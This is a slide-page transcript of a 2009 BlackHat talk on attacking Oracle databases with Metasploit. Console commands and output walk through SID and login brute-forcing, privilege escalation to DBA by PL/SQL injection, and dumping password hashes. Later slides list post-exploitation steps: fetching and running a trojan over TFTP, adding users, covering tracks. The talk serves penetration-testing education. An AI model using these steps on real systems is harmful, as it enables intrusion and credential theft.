with the metasploit framework
play

with the Metasploit Framework BlackHat USA 2009 Who Am I? Chris - PowerPoint PPT Presentation

Oct 25, 2023 •50 likes •360 views

Attacking Oracle with the Metasploit Framework BlackHat USA 2009 Who Am I? Chris Gates <cg [@] metasploit.com> What pays the bills Pentester/Security Consultant Security Blogger

  1. Attacking Oracle with the Metasploit Framework BlackHat USA 2009

  2. Who Am I?  Chris Gates  <cg [@] metasploit.com>  What pays the bills  Pentester/Security Consultant  Security Blogger  http://carnal0wnage.attackresearch.com  Security Twit  Carnal0wnage  Want more?  Chris Gates + carnal0wnage + maltego 

  3. DISCLAIMER

  4. Why Oracle?  Why the focus on Oracle?  Been on lots of pentests & seen lots of potential targets.  The Oracle business model allows for free downloads of products, but you pay for updates. The result is tons of potential shells.  Privilege Escalation and data theft is pretty easy, but shells are always better.

  5. Why Oracle?  Why the focus on Oracle?  Some support is provided by the commercial attack frameworks, but really don’t have much coverage for non-memory corruption vulns.  Other tools that target Oracle.  Inguma  Orasploit (not public) ‏  Pangolin (if you want to give your hard earned shell back to .cn) ‏  A few free commercial products focused on vulnerability assessment rather than exploitation.

  6. Current Metasploit Support  Some support for Oracle is already provided.  Exploit modules.  Handful of memory corruption modules that target earlier versions of Oracle and some of if its other applications.  Auxiliary modules.  Handful of modules that assist in discovering the SID, Identifying the version, sql injection, post exploitation, and a ntlm stealer.

  7. New Metasploit Support  Introduction of a TNS Mixin.  Handles a basic TNS packet structure.  "(CONNECT_DATA=(COMMAND=#{command}))”  Used for some of our auxiliary modules.  Used for our TNS exploits.  Introduction of a ORACLE Mixin.  Handles our direct database access.  Dependencies:  Oracle Instant Client.  ruby-dbi.  ruby-oci8.

  8. New Metasploit Support (cont.) ‏  Introduction of a ORACLE Mixin.  Really makes things simple. msf auxiliary(sql) > set SQL "select * from global_name" SQL => select * from global_name msf auxiliary(sql) > run [*] Sending SQL... [*] ORCL.REGRESS.RDBMS.DEV.US.ORACLE.COM [*] Done... [*] Auxiliary module execution completed msf auxiliary(sql) >

  9. Oracle Attack Methodology  We need 4 things to connect to an Oracle DB.  IP.  Port.  Service Identifier (SID).  Username/Password.

  10. Oracle Attack Methodology  Locate Oracle Systems.  Determine Oracle Version.  Determine Oracle SID.  Guess/Bruteforce USER/PASS.  Privilege Escalation via SQL Injection.  Manipulate Data/Post Exploitation.  Cover Tracks.

  11. Oracle Attack Methodology  Locate a system running Oracle.  Determine Oracle Version.  Determine Oracle SID.  Guess/Bruteforce USER/PASS.  Privilege Escalation via PL/SQL Injection.  Manipulate Data/Post Exploitation.  Cover Tracks.

  12. Oracle Attack Methodology  Determine Oracle Version.  tns_packet(“(CONNECT_DATA=(COMMAND=VERSION))”) ‏ msf auxiliary(tnslsnr_version) > set RHOSTS 172.10.1.107-172.10.1.110 RHOSTS => 172.10.1.107-172.10.1.110 msf auxiliary(tnslsnr_version) > run [*] Host 172.10.1.107 is running: Solaris: Version 9.2.0.1.0 – Production [*] Host 172.10.1.108 is running: Linux: Version 11.1.0.6.0 - Production [*] Host 172.10.1.109 is running: 32-bit Windows: Version 10.2.0.1.0 - Production [*] Auxiliary module execution completed msf auxiliary(tnslsnr_version) > db_notes [*] Time: Fri May 29 16:09:41 -0500 2009 Note: host=172.10.1.107 type=VERSION Solaris: Version 9.2.0.1.0 – Production … [*] Time: Fri May 29 16:09:44 -0500 2009 Note: host=172.10.1.109 type=VERSION data=32- bit Windows: Version 10.2.0.1.0 - Production msf auxiliary(tnslsnr_version) >

  13. Oracle Attack Methodology  Locate a system running Oracle.  Determine Oracle Version.  Determine Oracle SID.  Guess/Bruteforce USER/PASS.  Privilege Escalation via SQL Injection.  Manipulate Data/Post Exploitation.  Cover Tracks.

  14. Oracle Attack Methodology  Determine Oracle Service Identifier (SID).  tns_packet(“(CONNECT_DATA=(COMMAND=STATUS))”) ‏  By querying the TNS Listener directly, brute force for default SID's or query other components that may contain it. msf auxiliary(sid_enum) > run [*] Identified SID for 172.10.1.107: PLSExtProc [*] Identified SID for 172.10.1.107 : acms [*] Identified SERVICE_NAME for 172.10.1.107 : PLSExtProc [*] Identified SERVICE_NAME for 172.10.1.107 : acms [*] Auxiliary module execution completed msf auxiliary(sid_enum) > run [-] TNS listener protected for 172.10.1.109... [*] Auxiliary module execution completed

  15. Oracle Attack Methodology  Determine Oracle SID.  By quering the TNS Listener directly, brute force for default SID's or query other components that may contain it. msf auxiliary(sid_brute) > run [*] Starting brute force on 172.10.1.109, using sids from /home/cg/evil/msf3/dev/data/exploits/sid.txt... [*] Found SID 'ORCL' for host 172.10.1.109. [*] Auxiliary module execution completed

  16. Oracle Attack Methodology  Determine Oracle SID.  By quering the TNS Listener directly, brute force for default SID's or query other components that may contain it. msf auxiliary(sid_enum) > run [-] TNS listener protected for 172.10.1.108... [*] Auxiliary module execution completed msf auxiliary(sid_enum) > use auxiliary/scanner/oracle/spy_sid msf auxiliary(spy_sid) > run [*] Discovered SID: ‘ orcl' for host 172.10.1.108 [*] Auxiliary module execution completed msf auxiliary(spy_sid) >

  17. Oracle Attack Methodology  Locate a system running Oracle.  Determine Oracle Version.  Determine Oracle SID.  Guess/Bruteforce USER/PASS.  Privilege Escalation via SQL Injection.  Manipulate Data/Post Exploitation.  Cover Tracks.

  18. Oracle Attack Methodology  Determine Oracle Username/Password.  Brute Force For Known Default Accounts. msf auxiliary(login_brute) > set SID ORCL SID => ORCL msf auxiliary(login_brute) > run . [-] ORA-01017: invalid username/password; logon denied [-] ORA-01017: invalid username/password; logon denied [*] Auxiliary module execution completed msf auxiliary(login_brute) > db_notes [*] Time: Sat May 30 08:44:09 -0500 2009 Note: host=172.10.1.109 type=BRUTEFORCED_ACCOUNT data= SCOTT/TIGER

  19. Oracle Attack Methodology  Locate a system running Oracle.  Determine Oracle Version.  Determine Oracle SID.  Guess/Bruteforce USER/PASS.  Privilege Escalation via SQL Injection.  Manipulate Data/Post Exploitation.  Cover Tracks.

  20. Privilege Escalation  The set-up. msf auxiliary(lt_findricset) > set RHOST 172.10.1.109 RHOST => 172.10.1.109 msf auxiliary(lt_findricset) > set RPORT 1521 RPORT => 1521 msf auxiliary(lt_findricset) > set DBUSER SCOTT DBUSER => SCOTT msf auxiliary(lt_findricset) > set DBPASS TIGER DBPASS => TIGER msf auxiliary(lt_findricset) > set SID ORCL SID => ORACLE msf auxiliary(lt_findricset) > set SQL GRANT DBA TO SCOTT SQL => GRANT DBA TO SCOTT

  21. Privilege Escalation  Attacking SYS.LT.FINDRICSET. msf auxiliary(lt_findricset) > set SQL "grant dba to scott" SQL => grant dba to scott msf auxiliary(lt_findricset) > run [*] Sending first function... [*] Done... [*] Attempting sql injection on SYS.LT.FINDRICSET... [*] Done... [*] Removing function 'NBVFICZ'... [*] Done... [*] Auxiliary module execution completed msf auxiliary(lt_findricset) >

  22. Privilege Escalation  Success?  Before Injection. SQL => select * from user_role_privs msf auxiliary(sql) > run [*] Sending SQL... [*] SCOTT,CONNECT,NO,YES,NO [*] SCOTT,RESOURCE,NO,YES,NO  After Injection. msf auxiliary(sql) > run [*] Sending SQL... [*] SCOTT,CONNECT,NO,YES,NO [*] SCOTT,DBA,NO,YES,NO [*] SCOTT,RESOURCE,NO,YES,NO

  23. Privilege Escalation Exploits  Initial Coverage.  lt_findricset.rb  lt_findricset_cursor.rb  dbms_metadata_open.rb  dbms_cdc_ipublish.rb  dbms_cdc_publish.rb  lt_compressworkspace.rb  lt_mergeworkspace.rb  lt_removeworkspace.rb  lt_rollbackworkspace.rb

  24. Oracle Attack Methodology  Locate a system running Oracle.  Determine Oracle Version.  Determine Oracle SID.  Guess/Bruteforce USER/PASS.  Privilege Escalation via SQL Injection.  Manipulate Data/Post Exploitation.  Cover Tracks.

  25. Post Exploitation  If all I want is the Data after SQLI to DBA we are probably done.  sql.rb to run SQL commands. msf auxiliary(sql) > set SQL "select username,password,account_status from dba_users” SQL => select username,password,account_status from dba_users msf auxiliary(sql) > run [*] Sending SQL... [*] SYS,7087B7E95718C0CC,OPEN [*] SYSTEM,66DC0F914CDD83F3,OPEN [*] DBSNMP,E066D214D5421CCC,OPEN [*] SCOTT,F894844C34402B67,OPEN [*] Done... [*] Auxiliary module execution completed msf auxiliary(sql) >

  26. Post Exploitation  Data is nice, but shells are better   Several published methods for running OS commands via oracle libraries.  Via Java.  Extproc backdoors.  Dbms_Scheduler.  Run custom pl/sql or java

  27. Post Exploitation  Win32Exec  Grant user JAVASYSPRIVS using sql.rb.  Run win32exec.rb to run system commands.  Examples  Net User Add  TFTP get trojan.exe → execute trojan.exe  FTP Batch Scripts  Net User Add → metasploit psexec exploit

Recommend

with the Metasploit Framework defcon 17 Who Are We? Chris Gates &lt;cg [@]

with the Metasploit Framework defcon 17 Who Are We? Chris Gates &lt;cg [@]

Attacking Oracle with the Metasploit Framework defcon 17 Who Are We? Chris Gates &lt;cg [@] metasploit.com&gt; What pays the bills Pentester for Security Blogger http:/ / carnal0wnage.attackresearch.com Security Twit

868 views • 54 slides
Unmanned Aerial Vehicles Exploit Automation with the Metasploit Framework James Lee 1 # whoami

Unmanned Aerial Vehicles Exploit Automation with the Metasploit Framework James Lee 1 # whoami

Unmanned Aerial Vehicles Exploit Automation with the Metasploit Framework James Lee 1 # whoami James Lee egypt Core Developer, Metasploit Project Working full time on Metasploit for 2 User Interface Scanning for

793 views • 60 slides
who am i ? H D Moore &lt;hdm [at] metasploit.com&gt; Metasploit project Core developer and

who am i ? H D Moore &lt;hdm [at] metasploit.com&gt; Metasploit project Core developer and

METASPLOIT FOSDEM 2007 who am i ? H D Moore &lt;hdm [at] metasploit.com&gt; Metasploit project Core developer and project lead BreakingPoint Systems Director of Security Research FOSDEM 2007 why listen ? A great tool you can use today

403 views • 21 slides
Nmap/Zenmap/Metasploit/Armitage website: http://nmap.org/ http://www.metasploit.com April 20 th

Nmap/Zenmap/Metasploit/Armitage website: http://nmap.org/ http://www.metasploit.com April 20 th

Nmap/Zenmap/Metasploit/Armitage website: http://nmap.org/ http://www.metasploit.com April 20 th 2015 Only perform scans and exploitations after receiving permission from the owner of the machine/device. Nmap Purpose Scan a

671 views • 30 slides
Using Guided Missiles in Drive-bys Automatic browser fingerprinting and exploitation with the

Using Guided Missiles in Drive-bys Automatic browser fingerprinting and exploitation with the

Using Guided Missiles in Drive-bys Automatic browser fingerprinting and exploitation with the Metasploit Framework James Lee # whoami James Lee egypt Developer, Metasploit Project Co-Founder, Teardrop Security Member,

738 views • 35 slides
Introduction to Metasploit Stefano Cristalli November 29, 2018 Laboratorio di Sicurezza e Reti

Introduction to Metasploit Stefano Cristalli November 29, 2018 Laboratorio di Sicurezza e Reti

Introduction to Metasploit Stefano Cristalli November 29, 2018 Laboratorio di Sicurezza e Reti Universit` a degli Studi di Milano Table of contents 1. Basic commands in the Metasploit console 2. DEMO: exploiting Heartbleed 3. Exercises

690 views • 13 slides
Counterattack Turning the tables on exploitation attempts from tools like Metasploit whoami

Counterattack Turning the tables on exploitation attempts from tools like Metasploit whoami

Counterattack Turning the tables on exploitation attempts from tools like Metasploit whoami scriptjunkie Security research Metasploit contributor whoami wrote this thing whoami I work here Disclaimer This

1.02k views • 76 slides
Latest Metasploit Hardware Bridge Techniques Craig Smith - Research Director of Transportation

Latest Metasploit Hardware Bridge Techniques Craig Smith - Research Director of Transportation

Latest Metasploit Hardware Bridge Techniques Craig Smith - Research Director of Transportation Security Hardwear.io Agenda Overview of what the HW Bridge is Details on how it works How you can build hardware to support Metasploit

632 views • 22 slides
Research Project 2: Metasploit-able Honeypots Research questions Introduction Approach Wouter

Research Project 2: Metasploit-able Honeypots Research questions Introduction Approach Wouter

Metasploit- able Honeypots Wouter Katz Research Project 2: Metasploit-able Honeypots Research questions Introduction Approach Wouter Katz Results wouter.katz@os3.nl Conclusions References University of Amsterdam July 4th 2013 Wouter

623 views • 30 slides
Cyber@UC Meeting 30 Metasploit and Armitage Basics If Youre New! Join our Slack

Cyber@UC Meeting 30 Metasploit and Armitage Basics If Youre New! Join our Slack

Cyber@UC Meeting 30 Metasploit and Armitage Basics If Youre New! Join our Slack ucyber.slack.com Follow us on Twitter @UCyb3r and Facebook UC.yber; University of Cincinnati OWASP Chapter Feel free to get involved with one of our

408 views • 19 slides
Cyber@UC Meeting 50 Systems Exploitation with Metasploit If Youre New! Join our Slack:

Cyber@UC Meeting 50 Systems Exploitation with Metasploit If Youre New! Join our Slack:

Cyber@UC Meeting 50 Systems Exploitation with Metasploit If Youre New! Join our Slack: ucyber.slack.com SIGN IN! (Slackbot will post the link in #general) Feel free to get involved with one of our committees: Content Finance

382 views • 20 slides
MetaNet A botnet with Metasploit integration By : Matan Ramrazker, Guy Gelber What is a Botnet

MetaNet A botnet with Metasploit integration By : Matan Ramrazker, Guy Gelber What is a Botnet

MetaNet A botnet with Metasploit integration By : Matan Ramrazker, Guy Gelber What is a Botnet A Botnet is a software that is designed to perform simple automated and usually cyclical operations. Botnet management is performed remotely

507 views • 24 slides
Empirical study of the impact of Metasploit-related attacks in 4 years of attack traces E.

Empirical study of the impact of Metasploit-related attacks in 4 years of attack traces E.

Empirical study of the impact of Metasploit-related attacks in 4 years of attack traces E. Ramirez-Silva and M. Dacier Eurcom Institute - Sophia Antipolis, France ASIAN'07 December 11, 2007- Doha, Qatar Introduction Overview Introduction

584 views • 42 slides
with Metasploit Chris Gates (carnal0wnage) Whoami Chris Gates (CG) Twitter

with Metasploit Chris Gates (carnal0wnage) Whoami Chris Gates (CG) Twitter

Attacking Oracle Web Applications with Metasploit Chris Gates (carnal0wnage) Whoami Chris Gates (CG) Twitter carnal0wnage Blog carnal0wnage.attackresearch.com Job Sr. Security Consultant for Rapid7 Affiliations

1.46k views • 64 slides
Cyber@UC Meeting 79 Metasploit If Youre New! Join our Slack: cyberatuc.slack.com Check

Cyber@UC Meeting 79 Metasploit If Youre New! Join our Slack: cyberatuc.slack.com Check

Cyber@UC Meeting 79 Metasploit If Youre New! Join our Slack: cyberatuc.slack.com Check out our website: cyberatuc.org SIGN IN! (Slackbot will post the link in #general every Wed@6:30) Feel free to get involved with one of

693 views • 12 slides
Network Penetration Testing Toolkit NMAP, NETCAT, AND METASPLOIT BASICS DAY OF SHECURITY

Network Penetration Testing Toolkit NMAP, NETCAT, AND METASPLOIT BASICS DAY OF SHECURITY

Network Penetration Testing Toolkit NMAP, NETCAT, AND METASPLOIT BASICS DAY OF SHECURITY February 22. 2019 whoami AND HOW DID I GET HERE? Cecillia Tran Kelly Albrink External network pen testing &amp; web Network pen testing,

882 views • 31 slides
Introduction to Metasploit and tools Michal Novotn Malware Researcher &amp; Security Analyst

Introduction to Metasploit and tools Michal Novotn Malware Researcher &amp; Security Analyst

Introduction to Metasploit and tools Michal Novotn Malware Researcher &amp; Security Analyst Introduction Michal Novotn Malware Researcher &amp; Security Analyst at &amp; Co-founder and member of E-mail: michal.novotny@greycortex.com

454 views • 21 slides
Play Framework One Web Framework to rule them all Felix Mller Agenda Yet another web

Play Framework One Web Framework to rule them all Felix Mller Agenda Yet another web

Play Framework One Web Framework to rule them all Felix Mller Agenda Yet another web framework? Introduction for Java devs Demo Summary Yet another web framework? Yet another web framework? Why do we need another web framework?

656 views • 31 slides
GCC VAT Framework 6 member state, GCC Framework expected to be released shortly Minimum turnover

GCC VAT Framework 6 member state, GCC Framework expected to be released shortly Minimum turnover

Are you VAT ready ! VAT Readiness Presentation 17 April 2017 This presentation is intended for MCA Clients only, consent should be obtained from MCA prior to further circulation and distribution. GCC VAT Framework 6 member state, GCC Framework

803 views • 24 slides
A Recareering Framework @fuzzing_panda A Recareering Framework 1. Framework a. Recon b.

A Recareering Framework @fuzzing_panda A Recareering Framework 1. Framework a. Recon b.

A Recareering Framework @fuzzing_panda A Recareering Framework 1. Framework a. Recon b. Vulnerability Analysis c. Exploitation 2. Life Hack 3. A word to the wise history | grep -v infosec history | grep -v infosec How did I recareer into

697 views • 21 slides
April 2009 Wes J. Lloyd 1 Framework Invasiveness Coupling between application code and

April 2009 Wes J. Lloyd 1 Framework Invasiveness Coupling between application code and

April 2009 Wes J. Lloyd 1 Framework Invasiveness Coupling between application code and framework code Use of framework functions/methods Use of framework specific data types Implementation of framework interfaces Extension of

605 views • 39 slides
Northeast Conservation h Framework Framework What is it and why do we need it? National LCC

Northeast Conservation h Framework Framework What is it and why do we need it? National LCC

Northeast Conservation h Framework Framework What is it and why do we need it? National LCC Workshop Denver CO Denver CO March 2012 Northeast Conservation Framework Framework History Context Future Future NA Landscape

635 views • 38 slides
A Linear Logical A Linear Logical A Linear Logical Framework Framework Framework Iliano

A Linear Logical A Linear Logical A Linear Logical Framework Framework Framework Iliano

A Linear Logical A Linear Logical A Linear Logical Framework Framework Framework Iliano Cervesato - Frank Pfenning Department of Computer Science Carnegie Mellon University 11 th IEEE Symposium on Logic in Computer Science New

587 views • 30 slides
DPS framework DNSSEC Policy and Practice Statement framework

DPS framework DNSSEC Policy and Practice Statement framework

DPS framework DNSSEC Policy and Practice Statement framework draft-ietf-dnsop-dnssec-dps-framework-01 !&quot;#$&quot; Authors Fredrik Ljunggren, Kirei AB Anne-Marie Eklund Lwinder, .SE Tomofumi Okubo, VeriSign !&quot;#$&quot; Kirei AB 10

236 views • 10 slides

More recommend